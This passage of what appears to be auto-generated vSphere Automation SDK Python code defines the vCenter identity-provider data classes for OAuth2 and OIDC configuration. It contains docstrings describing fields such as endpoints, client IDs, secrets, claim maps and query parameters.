include only those groups that belong to one of these domains. This
attribute was added in vSphere API 7.0.0.
If None, domainNames will be the empty set and the domain
validation behavior at login with this identity provider will be as
follows: the user's domain will be parsed from the User Principal
Name (UPN) value that is found in the tokens returned by the
identity provider. This domain will then be implicitly trusted and
used to filter any groups that are also provided in the tokens.
:type auth_query_params: (:class:`dict` of :class:`str` and :class:`list` of :class:`str`) or ``None``
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: If the map is not empty, a
"?" is added to the endpoint URL, and combination of each k and
each string in the v is added with an "&" delimiter. Details:
* If the value contains only one string, then the key is added with
"k=v".
* If the value is an empty list, then the key is added without a
"=v".
* If the value contains multiple strings, then the key is repeated
in the query-string for each string in the value.
. This attribute was added in vSphere API 7.0.0.
If None, the map will be empty.
:type idm_protocol: :class:`Providers.IdmProtocol` or ``None``
:param idm_protocol: Communication protocol to the identity management endpoints. This
attribute was added in vSphere API 7.0.0.
If None, no communication protocol will be configured for the
identity provider.
:type idm_endpoints: :class:`list` of :class:`str`
:param idm_endpoints: Identity management endpoints. When specified, at least one
endpoint must be provided. This attribute was added in vSphere API
7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is one of :attr:`Providers.IdmProtocol.REST` or
:attr:`Providers.IdmProtocol.SCIM`.
:type active_directory_over_ldap: :class:`Providers.ActiveDirectoryOverLdap`
:param active_directory_over_ldap: Identity management configuration. If the protocol is LDAP, the
configuration must be set, else InvalidArgument is thrown. This
attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is :attr:`Providers.IdmProtocol.LDAP`.
:type upn_claim: :class:`str` or ``None``
:param upn_claim: Specifies which claim provides the user principal name (UPN) for
the user. This attribute was added in vSphere API 7.0.0.
If None, the claim named 'acct' will be used to provide backwards
compatibility with CSP.
:type groups_claim: :class:`str` or ``None``
:param groups_claim: Specifies which claim provides the group membership for the token
subject. These groups will be used for mapping to local groups per
the claim map. This attribute was added in vSphere API 7.0.0.
If None, the default behavior will be CSP backwards compatiblility.
The groups for the subject will be comprised of the groups in
'group_names' and 'group_ids' claims.
"""
self.config_tag = config_tag
self.oauth2 = oauth2
self.oidc = oidc
self.org_ids = org_ids
self.is_default = is_default
self.name = name
self.domain_names = domain_names
self.auth_query_params = auth_query_params
self.idm_protocol = idm_protocol
self.idm_endpoints = idm_endpoints
self.active_directory_over_ldap = active_directory_over_ldap
self.upn_claim = upn_claim
self.groups_claim = groups_claim
VapiStruct.__init__(self)
CreateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.create_spec', {
'config_tag': type.ReferenceType(__name__, 'Providers.ConfigType'),
'oauth2': type.OptionalType(type.ReferenceType(__name__, 'Providers.Oauth2CreateSpec')),
'oidc': type.OptionalType(type.ReferenceType(__name__, 'Providers.OidcCreateSpec')),
'org_ids': type.OptionalType(type.SetType(type.StringType())),
'is_default': type.OptionalType(type.BooleanType()),
'name': type.OptionalType(type.StringType()),
'domain_names': type.OptionalType(type.SetType(type.StringType())),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
'idm_protocol': type.OptionalType(type.ReferenceType(__name__, 'Providers.IdmProtocol')),
'idm_endpoints': type.OptionalType(type.ListType(type.URIType())),
'active_directory_over_ldap': type.OptionalType(type.ReferenceType(__name__, 'Providers.ActiveDirectoryOverLdap')),
'upn_claim': type.OptionalType(type.StringType()),
'groups_claim': type.OptionalType(type.StringType()),
},
CreateSpec,
False,
None))
class UpdateSpec(VapiStruct):
"""
The ``Providers.UpdateSpec`` class contains the information used to update
the identity provider. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'config_tag',
{
'Oauth2' : [('oauth2', True)],
'Oidc' : [('oidc', True)],
}
),
UnionValidator(
'idm_protocol',
{
'REST' : [('idm_endpoints', True)],
'SCIM' : [('idm_endpoints', True)],
'LDAP' : [('active_directory_over_ldap', True)],
}
),
]
def __init__(self,
config_tag=None,
oauth2=None,
oidc=None,
org_ids=None,
make_default=None,
name=None,
domain_names=None,
auth_query_params=None,
idm_protocol=None,
idm_endpoints=None,
active_directory_over_ldap=None,
upn_claim=None,
reset_upn_claim=None,
groups_claim=None,
reset_groups_claim=None,
):
"""
:type config_tag: :class:`Providers.ConfigType`
:param config_tag: The config type of the identity provider. This attribute was added
in vSphere API 7.0.0.
:type oauth2: :class:`Providers.Oauth2UpdateSpec`
:param oauth2: OAuth2 UpdateSpec. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oauth2`.
:type oidc: :class:`Providers.OidcUpdateSpec`
:param oidc: OIDC UpdateSpec. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oidc`.
:type org_ids: :class:`set` of :class:`str` or ``None``
:param org_ids: The set orgIds as part of SDDC creation which provides the basis
for tenancy. This attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type make_default: :class:`bool` or ``None``
:param make_default: Specifies whether to make this the default provider. If
``makeDefault`` is set to true, this provider will be flagged as
the default provider and any other providers that had previously
been flagged as the default will be made non-default. If
``makeDefault`` is set to false, this provider's default flag will
not be modified. This attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type name: :class:`str` or ``None``
:param name: The user friendly name for the provider. This name can be used for
human-readable identification purposes, but it does not have to be
unique, as the system will use internal UUIDs to differentiate
providers. This attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type domain_names: :class:`set` of :class:`str` or ``None``
:param domain_names: Set of fully qualified domain names to trust when federating with
this identity provider. Tokens from this identity provider will
only be validated if the user belongs to one of these domains, and
any domain-qualified groups in the tokens will be filtered to
include only those groups that belong to one of these domains. This
attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged. If domainNames is an empty set,
domain validation behavior at login with this identity provider
will be as follows: the user's domain will be parsed from the User
Principal Name (UPN) value that is found in the tokens returned by
the identity provider. This domain will then be implicitly trusted
and used to filter any groups that are also provided in the tokens.
:type auth_query_params: (:class:`dict` of :class:`str` and :class:`list` of :class:`str`) or ``None``
:param auth_query_params: key/value pairs that are to be appended to the authEndpoint
request. How to append to authEndpoint request: If the map is not
empty, a "?" is added to the endpoint URL, and combination of each
k and each string in the v is added with an "&" delimiter. Details:
If the value contains only one string, then the key is added with
"k=v". If the value is an empty list, then the key is added without
a "=v". If the value contains multiple strings, then the key is
repeated in the query-string for each string in the value. If the
map is empty, deletes all params. This attribute was added in
vSphere API 7.0.0.
If None, leaves value unchanged.
:type idm_protocol: :class:`Providers.IdmProtocol` or ``None``
:param idm_protocol: The protocol to communicate to the identity management endpoints.
This attribute was added in vSphere API 7.0.0.
If None, leave value unchanged.
:type idm_endpoints: :class:`list` of :class:`str`
:param idm_endpoints: Identity management endpoints. When specified, at least one
endpoint must be provided. This attribute was added in vSphere API
7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is one of :attr:`Providers.IdmProtocol.REST` or
:attr:`Providers.IdmProtocol.SCIM`.
:type active_directory_over_ldap: :class:`Providers.ActiveDirectoryOverLdap`
:param active_directory_over_ldap: Identity management configuration. If the protocol is LDAP, the
configuration must be set, else InvalidArgument is thrown. This
attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is :attr:`Providers.IdmProtocol.LDAP`.
:type upn_claim: :class:`str` or ``None``
:param upn_claim: Specifies which claim provides the user principal name (UPN) for
the subject of the token. This attribute was added in vSphere API
7.0.0.
If None, leaves value unchanged.
:type reset_upn_claim: :class:`bool` or ``None``
:param reset_upn_claim: Flag indicating whether the user principal name (UPN) claim should
be set back to its default value. If this field is set to ``true``,
the user principal name (UPN) claim will be set to 'acct', which is
used for backwards compatibility with CSP. If this field is set to
``false``, the existing user principal name (UPN) claim will be
changed to the value specified in
:attr:`Providers.UpdateSpec.upn_claim`, if any. This attribute was
added in vSphere API 7.0.0.
If None, the existing user principal name (UPN) claim will be
changed to the value specified in
:attr:`Providers.UpdateSpec.upn_claim`, if any.
:type groups_claim: :class:`str` or ``None``
:param groups_claim: Specifies which claim provides the group membership for the token
subject. This attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type reset_groups_claim: :class:`bool` or ``None``
:param reset_groups_claim: Flag indicating whether any existing groups claim value should be
removed. If this field is set to ``true``, the existing groups
claim value is removed which defaults to backwards compatibility
with CSP. In this case, the groups for the subject will be
comprised of the groups in 'group_names' and 'group_ids' claims. If
this field is set to ``false``, the existing groups claim will be
changed to the value specified in
:attr:`Providers.UpdateSpec.groups_claim`, if any. This attribute
was added in vSphere API 7.0.0.
If None, the existing groups claim will be changed to the value
specified in :attr:`Providers.UpdateSpec.groups_claim`, if any.
"""
self.config_tag = config_tag
self.oauth2 = oauth2
self.oidc = oidc
self.org_ids = org_ids
self.make_default = make_default
self.name = name
self.domain_names = domain_names
self.auth_query_params = auth_query_params
self.idm_protocol = idm_protocol
self.idm_endpoints = idm_endpoints
self.active_directory_over_ldap = active_directory_over_ldap
self.upn_claim = upn_claim
self.reset_upn_claim = reset_upn_claim
self.groups_claim = groups_claim
self.reset_groups_claim = reset_groups_claim
VapiStruct.__init__(self)
UpdateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.update_spec', {
'config_tag': type.ReferenceType(__name__, 'Providers.ConfigType'),
'oauth2': type.OptionalType(type.ReferenceType(__name__, 'Providers.Oauth2UpdateSpec')),
'oidc': type.OptionalType(type.ReferenceType(__name__, 'Providers.OidcUpdateSpec')),
'org_ids': type.OptionalType(type.SetType(type.StringType())),
'make_default': type.OptionalType(type.BooleanType()),
'name': type.OptionalType(type.StringType()),
'domain_names': type.OptionalType(type.SetType(type.StringType())),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
'idm_protocol': type.OptionalType(type.ReferenceType(__name__, 'Providers.IdmProtocol')),
'idm_endpoints': type.OptionalType(type.ListType(type.URIType())),
'active_directory_over_ldap': type.OptionalType(type.ReferenceType(__name__, 'Providers.ActiveDirectoryOverLdap')),
'upn_claim': type.OptionalType(type.StringType()),
'reset_upn_claim': type.OptionalType(type.BooleanType()),
'groups_claim': type.OptionalType(type.StringType()),
'reset_groups_claim': type.OptionalType(type.BooleanType()),
},
UpdateSpec,
False,
None))
class Oauth2Summary(VapiStruct):
"""
The ``Providers.Oauth2Summary`` class contains commonly used information
about an OAuth2 identity provider. This class was added in vSphere API
7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
auth_endpoint=None,
token_endpoint=None,
client_id=None,
authentication_header=None,
auth_query_params=None,
):
"""
:type auth_endpoint: :class:`str`
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
:type token_endpoint: :class:`str`
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type authentication_header: :class:`str`
:param authentication_header: The authentication data used as part of request header to acquire
or refresh an OAuth2 token. The data format depends on the
authentication method used. Example of basic authentication format:
Authorization: Basic [base64Encode(clientId + ":" + secret)]. This
attribute was added in vSphere API 7.0.0.
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: If the map is not empty, a
"?" is added to the endpoint URL, and combination of each k and
each string in the v is added with an "&" delimiter. Details:
* If the value contains only one string, then the key is added with
"k=v".
* If the value is an empty list, then the key is added without a
"=v".
* If the value contains multiple strings, then the key is repeated
in the query-string for each string in the value.
. This attribute was added in vSphere API 7.0.0.
"""
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.client_id = client_id
self.authentication_header = authentication_header
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
Oauth2Summary._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oauth2_summary', {
'auth_endpoint': type.URIType(),
'token_endpoint': type.URIType(),
'client_id': type.StringType(),
'authentication_header': type.StringType(),
'auth_query_params': type.MapType(type.StringType(), type.ListType(type.StringType())),
},
Oauth2Summary,
False,
None))
class Oauth2Info(VapiStruct):
"""
The ``Providers.Oauth2Info`` class contains the information about an OAuth2
identity provider. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
auth_endpoint=None,
token_endpoint=None,
public_key_uri=None,
client_id=None,
client_secret=None,
claim_map=None,
issuer=None,
authentication_method=None,
auth_query_params=None,
):
"""
:type auth_endpoint: :class:`str`
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
:type token_endpoint: :class:`str`
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
:type public_key_uri: :class:`str`
:param public_key_uri: Endpoint to retrieve the provider public key for validation. This
attribute was added in vSphere API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type client_secret: :class:`str`
:param client_secret: The secret shared between the client and the provider. This
attribute was added in vSphere API 7.0.0.
:type claim_map: :class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
incoming JWT. The value is another map with an external group as
the key and a vCenter Server group as value. This attribute was
added in vSphere API 7.0.0.
:type issuer: :class:`str`
:param issuer: The identity provider namespace. It is used to validate the issuer
in the acquired OAuth2 token. This attribute was added in vSphere
API 7.0.0.
:type authentication_method: :class:`Providers.Oauth2AuthenticationMethod`
:param authentication_method: Authentication method used by the provider. This attribute was
added in vSphere API 7.0.0.
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: If the map is not empty, a
"?" is added to the endpoint URL, and combination of each k and
each string in the v is added with an "&" delimiter. Details:
* If the value contains only one string, then the key is added with
"k=v".
* If the value is an empty list, then the key is added without a
"=v".
* If the value contains multiple strings, then the key is repeated
in the query-string for each string in the value.
. This attribute was added in vSphere API 7.0.0.
"""
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.public_key_uri = public_key_uri
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
self.issuer = issuer
self.authentication_method = authentication_method
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
Oauth2Info._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oauth2_info', {
'auth_endpoint': type.URIType(),
'token_endpoint': type.URIType(),
'public_key_uri': type.URIType(),
'client_id': type.StringType(),
'client_secret': type.StringType(),
'claim_map': type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType()))),
'issuer': type.StringType(),
'authentication_method': type.ReferenceType(__name__, 'Providers.Oauth2AuthenticationMethod'),
'auth_query_params': type.MapType(type.StringType(), type.ListType(type.StringType())),
},
Oauth2Info,
False,
None))
class Oauth2CreateSpec(VapiStruct):
"""
The ``Providers.Oauth2CreateSpec`` class contains the information used to
create an OAuth2 identity provider. This class was added in vSphere API
7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
auth_endpoint=None,
token_endpoint=None,
public_key_uri=None,
client_id=None,
client_secret=None,
claim_map=None,
issuer=None,
authentication_method=None,
auth_query_params=None,
):
"""
:type auth_endpoint: :class:`str`
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
:type token_endpoint: :class:`str`
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
:type public_key_uri: :class:`str`
:param public_key_uri: Endpoint to retrieve the provider public key for validation. This
attribute was added in vSphere API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type client_secret: :class:`str`
:param client_secret: The secret shared between the client and the provider. This
attribute was added in vSphere API 7.0.0.
:type claim_map: :class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
incoming JWT. The value is another map with an external group as
the key and a vCenter Server group as value. This attribute was
added in vSphere API 7.0.0.
:type issuer: :class:`str`
:param issuer: The identity provider namespace. It is used to validate the issuer
in the acquired OAuth2 token. This attribute was added in vSphere
API 7.0.0.
:type authentication_method: :class:`Providers.Oauth2AuthenticationMethod`
:param authentication_method: Authentication method used by the provider. This attribute was
added in vSphere API 7.0.0.
:type auth_query_params: (:class:`dict` of :class:`str` and :class:`list` of :class:`str`) or ``None``
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: If the map is not empty, a
"?" is added to the endpoint URL, and combination of each k and
each string in the v is added with an "&" delimiter. Details:
* If the value contains only one string, then the key is added with
"k=v".
* If the value is an empty list, then the key is added without a
"=v".
* If the value contains multiple strings, then the key is repeated
in the query-string for each string in the value.
. This attribute was added in vSphere API 7.0.0.
If None, the map will be empty.
"""
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.public_key_uri = public_key_uri
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
self.issuer = issuer
self.authentication_method = authentication_method
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
Oauth2CreateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oauth2_create_spec', {
'auth_endpoint': type.URIType(),
'token_endpoint': type.URIType(),
'public_key_uri': type.URIType(),
'client_id': type.StringType(),
'client_secret': type.StringType(),
'claim_map': type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType()))),
'issuer': type.StringType(),
'authentication_method': type.ReferenceType(__name__, 'Providers.Oauth2AuthenticationMethod'),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
},
Oauth2CreateSpec,
False,
None))
class Oauth2UpdateSpec(VapiStruct):
"""
The ``Providers.Oauth2UpdateSpec`` class contains the information used to
update the OAuth2 identity provider. This class was added in vSphere API
7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
auth_endpoint=None,
token_endpoint=None,
public_key_uri=None,
client_id=None,
client_secret=None,
claim_map=None,
issuer=None,
authentication_method=None,
auth_query_params=None,
):
"""
:type auth_endpoint: :class:`str` or ``None``
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type token_endpoint: :class:`str` or ``None``
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
If None, leaves value unchanged.
:type public_key_uri: :class:`str` or ``None``
:param public_key_uri: Endpoint to retrieve the provider public key for validation. This
attribute was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type client_id: :class:`str` or ``None``
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type client_secret: :class:`str` or ``None``
:param client_secret: Shared secret between identity provider and client. This attribute
was added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type claim_map: (:class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)) or ``None``
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
incoming JWT. The value is another map with an external group as
the key and a vCenter Server group as value. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type issuer: :class:`str` or ``None``
:param issuer: The identity provider namespace. It is used to validate the issuer
in the acquired OAuth2 token. This attribute was added in vSphere
API 7.0.0.
If None, leaves value unchanged.
:type authentication_method: :class:`Providers.Oauth2AuthenticationMethod` or ``None``
:param authentication_method: Authentication method used by the provider. This attribute was
added in vSphere API 7.0.0.
If None, leaves value unchanged.
:type auth_query_params: (:class:`dict` of :class:`str` and :class:`list` of :class:`str`) or ``None``
:param auth_query_params: key/value pairs that are to be appended to the authEndpoint
request. How to append to authEndpoint request: If the map is not
empty, a "?" is added to the endpoint URL, and combination of each
k and each string in the v is added with an "&" delimiter. Details:
If the value contains only one string, then the key is added with
"k=v". If the value is an empty list, then the key is added without
a "=v". If the value contains multiple strings, then the key is
repeated in the query-string for each string in the value. If the
map is empty, deletes all params. This attribute was added in
vSphere API 7.0.0.
If None, leaves value unchanged.
"""
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.public_key_uri = public_key_uri
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
self.issuer = issuer
self.authentication_method = authentication_method
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
Oauth2UpdateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oauth2_update_spec', {
'auth_endpoint': type.OptionalType(type.URIType()),
'token_endpoint': type.OptionalType(type.URIType()),
'public_key_uri': type.OptionalType(type.URIType()),
'client_id': type.OptionalType(type.StringType()),
'client_secret': type.OptionalType(type.StringType()),
'claim_map': type.OptionalType(type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType())))),
'issuer': type.OptionalType(type.StringType()),
'authentication_method': type.OptionalType(type.ReferenceType(__name__, 'Providers.Oauth2AuthenticationMethod')),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
},
Oauth2UpdateSpec,
False,
None))
class OidcSummary(VapiStruct):
"""
The ``Providers.OidcSummary`` class contains commonly used information
about an OIDC identity provider. OIDC is a discovery protocol for OAuth2
configuration metadata, so ``Providers.OidcSummary`` contains discovered
OAuth2 metadata. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
discovery_endpoint=None,
logout_endpoint=None,
auth_endpoint=None,
token_endpoint=None,
client_id=None,
authentication_header=None,
auth_query_params=None,
):
"""
:type discovery_endpoint: :class:`str`
:param discovery_endpoint: Endpoint to retrieve the provider metadata. This attribute was
added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type logout_endpoint: :class:`str`
:param logout_endpoint: The endpoint to use for terminating the user's session at the
identity provider. This value is automatically derived from the
metadata information provided by the OIDC discovery endpoint. This
attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type auth_endpoint: :class:`str`
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
:type token_endpoint: :class:`str`
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type authentication_header: :class:`str`
:param authentication_header: The authentication data used as part of request header to acquire
or refresh an OAuth2 token. The data format depends on the
authentication method used. Example of basic authentication format:
Authorization: Basic [base64Encode(clientId + ":" + secret)]. This
attribute was added in vSphere API 7.0.0.
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: If the map is not empty, a
"?" is added to the endpoint URL, and combination of each k and
each string in the v is added with an "&" delimiter. Details:
* If the value contains only one string, then the key is added with
"k=v".
* If the value is an empty list, then the key is added without a
"=v".
* If the value contains multiple strings, then the key is repeated
in the query-string for each string in the value.
. This attribute was added in vSphere API 7.0.0.
"""
self.discovery_endpoint = discovery_endpoint
self.logout_endpoint = logout_endpoint
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.client_id = client_id
self.authentication_header = authentication_header
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
OidcSummary._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oidc_summary', {
'discovery_endpoint': type.OptionalType(type.URIType()),
'logout_endpoint': type.OptionalType(type.URIType()),
'auth_endpoint': type.URIType(),
'token_endpoint': type.URIType(),
'client_id': type.StringType(),
'authentication_header': type.StringType(),
'auth_query_params': type.MapType(type.StringType(), type.ListType(type.StringType())),
},
OidcSummary,
False,
None))
class OidcInfo(VapiStruct):
"""
The ``Providers.OidcInfo`` class contains information about an OIDC
identity provider. OIDC is a discovery protocol for OAuth2 configuration
metadata, so ``Providers.OidcInfo`` contains additional discovered OAuth2
metadata. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
discovery_endpoint=None,
logout_endpoint=None,
auth_endpoint=None,
token_endpoint=None,
public_key_uri=None,
client_id=None,
client_secret=None,
claim_map=None,
issuer=None,
authentication_method=None,
auth_query_params=None,
):
"""
:type discovery_endpoint: :class:`str`
:param discovery_endpoint: Endpoint to retrieve the provider metadata. This attribute was
added in vSphere API 7.0.0.
:type logout_endpoint: :class:`str`
:param logout_endpoint: The endpoint to use for terminating the user's session at the
identity provider. This value is automatically derived from the
metadata information provided by the OIDC discovery endpoint. This
attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type auth_endpoint: :class:`str`
:param auth_endpoint: Authentication/authorization endpoint of the provider. This
attribute was added in vSphere API 7.0.0.
:type token_endpoint: :class:`str`
:param token_endpoint: Token endpoint of the provider. This attribute was added in vSphere
API 7.0.0.
:type public_key_uri: :class:`str`
:param public_key_uri: Endpoint to retrieve the provider public key for validation. This
attribute was added in vSphere API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type client_secret: :class:`str`
:param client_secret: The secret shared between the client and the provider. This
attribute was added in vSphere API 7.0.0.
:type claim_map: :class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
incoming JWT. The value is another map with an external group as
the key and a vCenter Server group as value. This attribute was
added in vSphere API 7.0.0.
:type issuer: :class:`str`
:param issuer: The identity provider namespace. It is used to validate the issuer
in the acquired OAuth2 token. This attribute was added in vSphere
API 7.0.0.
:type authentication_method: :class:`Providers.Oauth2AuthenticationMethod`
:param authentication_method: Authentication method used by the provider. This attribute was
added in vSphere API 7.0.0.
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: If the map is not empty, a
"?" is added to the endpoint URL, and combination of each k and
each string in the v is added with an "&" delimiter. Details:
* If the value contains only one string, then the key is added with
"k=v".
* If the value is an empty list, then the key is added without a
"=v".
* If the value contains multiple strings, then the key is repeated
in the query-string for each string in the value.
. This attribute was added in vSphere API 7.0.0.
"""
self.discovery_endpoint = discovery_endpoint
self.logout_endpoint = logout_endpoint
self.auth_endpoint = auth_endpoint
self.token_endpoint = token_endpoint
self.public_key_uri = public_key_uri
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
self.issuer = issuer
self.authentication_method = authentication_method
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
OidcInfo._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oidc_info', {
'discovery_endpoint': type.URIType(),
'logout_endpoint': type.OptionalType(type.URIType()),
'auth_endpoint': type.URIType(),
'token_endpoint': type.URIType(),
'public_key_uri': type.URIType(),
'client_id': type.StringType(),
'client_secret': type.StringType(),
'claim_map': type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType()))),
'issuer': type.StringType(),
'authentication_method': type.ReferenceType(__name__, 'Providers.Oauth2AuthenticationMethod'),
'auth_query_params': type.MapType(type.StringType(), type.ListType(type.StringType())),
},
OidcInfo,
False,
None))
class OidcCreateSpec(VapiStruct):
"""
The ``Providers.OidcCreateSpec`` class contains the information used to
create an OIDC identity provider. This class was added in vSphere API
7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
discovery_endpoint=None,
client_id=None,
client_secret=None,
claim_map=None,
):
"""
:type discovery_endpoint: :class:`str`
:param discovery_endpoint: Endpoint to retrieve the provider metadata. This attribute was
added in vSphere API 7.0.0.
:type client_id: :class:`str`
:param client_id: Client identifier to connect to the provider. This attribute was
added in vSphere API 7.0.0.
:type client_secret: :class:`str`
:param client_secret: The secret shared between the client and the provider. This
attribute was added in vSphere API 7.0.0.
:type claim_map: :class:`dict` of :class:`str` and (:class:`dict` of :class:`str` and :class:`list` of :class:`str`)
:param claim_map: The map used to transform an OAuth2 claim to a corresponding claim
that vCenter Server understands. Currently only the key "perms" is
supported. The key "perms" is used for mapping the "perms" claim of
incoming JWT. The value is another map with an external group as
the key and a vCenter Server group as value. This attribute was
added in vSphere API 7.0.0.
"""
self.discovery_endpoint = discovery_endpoint
self.client_id = client_id
self.client_secret = client_secret
self.claim_map = claim_map
VapiStruct.__init__(self)
OidcCreateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.oidc_create_spec', {
'discovery_endpoint': type.URIType(),
'client_id': type.StringType(),
'client_secret': type.StringType(),
'claim_map': type.MapType(type.StringType(), type.MapType(type.StringType(), type.ListType(type.StringType()))),
},
OidcCreateSpec,
False,
None))
class OidcUpdateSpec(VapiStruct):
"""
The ``Providers.OidcUpdateSpec`` class contains the information used to
update the OIDC identity provider. This class was added in vSphere API
7.0.0.
.. tip::
